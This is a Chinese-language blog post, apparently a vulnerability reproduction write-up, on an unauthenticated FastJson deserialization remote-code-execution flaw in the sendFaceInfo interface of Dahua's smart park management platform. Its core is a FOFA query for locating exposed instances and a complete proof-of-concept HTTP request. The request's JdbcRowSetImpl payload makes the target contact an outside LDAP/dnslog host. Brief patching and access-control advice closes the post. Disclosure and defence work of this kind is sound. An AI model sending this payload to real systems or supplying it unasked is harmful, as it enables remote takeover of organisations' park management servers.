大华智慧园区综合管理平台 sendFaceInfo RCE漏洞复现
发布时间
阅读量:
阅读量
大华智慧园区综合管理平台是一款具备园区运营、资源调配和智能服务功能的管理平台,旨在优化资源分配并提升用户体验。然而,该平台存在利用FastJson组件的漏洞,攻击者可通过发送恶意序列化数据执行任意指令,导致代码执行。漏洞复现环境为FOFA:app="dahua-智慧园区综合管理平台",并提供了详细的PoC代码。修复建议包括尽快补丁修复和限制访问来源,以避免平台在公网或不安全网络中的暴露。
0x01 产品简介
大华智慧园区综合管理平台系统旨在为园区提供综合管理服务。该系统具备园区运营功能、资源调配能力以及智能服务系统,旨在通过优化资源分配,满足园区多维度管理需求。同时,平台通过提供智能化服务,提升了用户体验。
0x02 漏洞概述
由于大华智慧园区综合管理平台在使用存在安全漏洞的FastJson组件时,未进行身份认证的攻击者可通过<CardSolution/card/face/sendFaceInfo>接口向其发送恶意序列化数据,从而导致代码被任意执行。
0x03 复现环境
FOFA:app="dahua-智慧园区综合管理平台"
0x04 漏洞复现
PoC
POST /CardSolution/card/face/sendFaceInfo HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept-Encoding: gzip
Connection: close
Content-Type: application/json
{"ftpUrl":{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://7iuvk4.dnslog.cn","autoCommit":true}}}Dnslog验证
0x05 修复建议
建议使用相关系统的用户,及时安装补丁程序,同时实施访问控制措施,避免大华智慧园区综合管理平台暴露在公网或不安全的网络环境中。
全部评论 (0)
还没有任何评论哟~